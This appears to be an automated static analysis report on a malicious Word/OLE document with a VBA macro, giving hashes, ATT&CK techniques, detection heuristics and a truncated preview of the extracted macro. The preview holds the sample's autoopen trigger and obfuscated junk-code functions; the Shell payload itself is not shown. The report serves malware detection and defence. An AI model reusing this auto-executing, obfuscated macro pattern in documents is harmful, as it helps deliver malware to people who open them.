Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf11e4a6dab7de0d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 77.8 KB
First seen: 2017-11-13
MD5: 6b603d9f269248713a4a4e68694b293e
SHA-1: d297bd5b6a2d6656418bc5da0b5f7daff912d879
SHA-256: bf11e4a6dab7de0d0634dc17ad0e4391ac5075db25e2a556224028eca83d8a93
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is an OLE document containing a VBA macro. The macro is triggered automatically on document open through its 'autoopen' routine and uses a Shell() call, indicating an attempt to execute arbitrary commands. This strongly suggests downloader or dropper functionality, where the macro fetches and executes a second-stage payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.

Heuristics (7)

  • ClamAV: Doc.Macro.DollarShell-6346616-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11672 bytes
SHA-256: 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
RZwZYPM
End Sub

Function kNCwPPkFd()
Dim GutFDFNybds(8089)
GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406
 GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423
GutFDFNybds(4342) = sHVnYaZuR
 GutFDFNybds(2382) = UfNMzVwuM
 GutFDFNybds(557) = xLdSpLf
 GutFDFNybds(629) = vTTKYGKmuv
 GutFDFNybds(2795) = CrmBcuvWC
 GutFDFNybds(2405) = exEBCkAL
 GutFDFNybds(4451) = pgGHFPYZdy
 GutFDFNybds(2122) = gVxXHMhTM
 GutFDFNybds(5029) = nTMxXxtDL
 GutFDFNybds(3250) = cKcpvXG
 GutFDFNybds(3999) = FxMPYCNRWe
End Function
Function gkCetzrWsg()
Dim zvDNUZB(1233)
zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944
zvDNUZB(975) = tRsMZML
 zvDNUZB(572) = TDYFhcgKE
 zvDNUZB(709) = bMxWLzh
 zvDNUZB(262) = vZVpxwdDxev
 zvDNUZB(228) = XwwERktFf
 zvDNUZB(81) = FttyLXGgdKD
 zvDNUZB(332) = MkdhmBUTY
 zvDNUZB(684) = vSCCfPHfr
 zvDNUZB(806) = WXpAhFrxnd
 zvDNUZB(975) = PtHxpePczMs
 zvDNUZB(301) = CDLgXUKry
 zvDNUZB(182) = UXMuYDaW
 zvDNUZB(184) = BpCsfEcnZ
 zvDNUZB(158) = DfktxzuL
 zvDNUZB(303) = SvVSrGyauu
 zvDNUZB(489) = MfmLRttRGDk
 zvDNUZB(180) = fgFFvVrze
 zvDNUZB(576) = EMZSGKM
 zvDNUZB(535) = gACHwUa
 zvDNUZB(761) = SHpTxZGK
 zvDNUZB(644) = KbzdzhnNBZy
 zvDNUZB(1105) = XfyPudbBNNM
End Function
Function hzvmYnYUkw()
Dim yyPnEeM(6298)
yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019
 yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760
 yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032
yyPnEeM(3336) = ynLcTsuK
 yyPnEeM(1822) = kuugbMCnpa
 yyPnEeM(1442) = gDPKYpefhfx
 yyPnEeM(2591) = uXAXDsZDDBn
 yyPnEeM(2934) = LUrwbKrVfF
 yyPnEeM(2858) = dpeycnMTM
 yyPnEeM(2780) = dRzuUFD
 yyPnEeM(1901) = eGYpXwg
 yyPnEeM(2508) = DyDFpzM
 yyPnEeM(4870) = VhAUkzxha
 yyPnEeM(135) = FyUaYZS
 yyPnEeM(1148) = YyMmyhecM
 yyPnEeM(2157) = YYzMytSzB
 yyPnEeM(5411) = WApKTcg
 yyPnEeM(2093) = PDwYmkgPCer
 yyPnEeM(2462) = AhpxSZeNwZs
 yyPnEeM(3939) = HrNECVA
 yyPnEeM(1683) = rZPUdnYssP
 yyPnEeM(509) = dtnWNFbSr
 yyPnEeM(4444) = BfxMzwg
 yyPnEeM(5914) = mprHLXwTCyc
 yyPnEeM(4473) = bbcKDBxKh
 yyPnEeM(4062) = eZPPGHpFB
 yyPnEeM(1949) = ueRzgKEk
 yyPnEeM(2535) = vVwXdDwuVp
 yyPnEeM(923) = TAMTGzRPa
End Function
Function KkKDUAzcSw()
Dim ngeCtBrdPp(5921)
ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888
 ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633
 ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155
ngeCtBrdPp(5548) = DzwvmaYBu
 ngeCtBrdPp(5615) = btDwYCHU
 ngeCtBrdPp(4139) = NzbytHV
 ngeCtBrdPp(3241) = swrDKwrtL
 ngeCtBrdPp(3078) = VXpHRpU
 ngeCtBrdPp(2615) = pKprMaSe
 ngeCtBrdPp(954) = WYBvzXcc
 ngeCtBrdPp(919) = vFtVCczS
 ngeCtBrdPp(2432) = UwrbAZtUSE
 ngeCtBrdPp(1307) = ptawGGZTeyk
 ngeCtBrdPp(3512) = TemDwAh
 ngeCtBrdPp(2411) = KTfLESnWhY
 ngeCtBrdPp(5264) = szwrFKdBE
 ngeCtBrdPp(4510) = ryrTWZFNuz
 ngeCtBrdPp(1609) = TMGMsmaMGa
 ngeCtBrdPp(4054) = zkTrhfwxp
 ngeCtBrdPp(4184) = EsEULEhrG
 ngeCtBrdPp(5510) = hYbMcXxZKfX
 ngeCtBrdPp(767) = fnsRHMvnRBa
 ngeCtBrdPp(4645) = kHtsCWm
 ngeCtBrdPp(99) = xvwrLRvVT
 ngeCtBrdPp(1167) = dNcmgHngS
 ngeCtBrdPp(5840) = wTUfXsam
 ngeCtBrdPp(5655) = dBuxdDDYf
End Function
Function ZtBSGbLzXHa()
Dim XgnefYfX(9516)
XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712
 XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196
XgnefYfX(5975) = XUMzkLWpc
 XgnefYfX(3632) = nAsuaDm
 XgnefYfX(9384) = fDUkuEeFbTC
 XgnefYfX(1556) = ZESzdUFxPnt
 XgnefYfX(6100) = abnKyfSyc
 XgnefYfX(7632) = LuCUcUywe
 
... (truncated)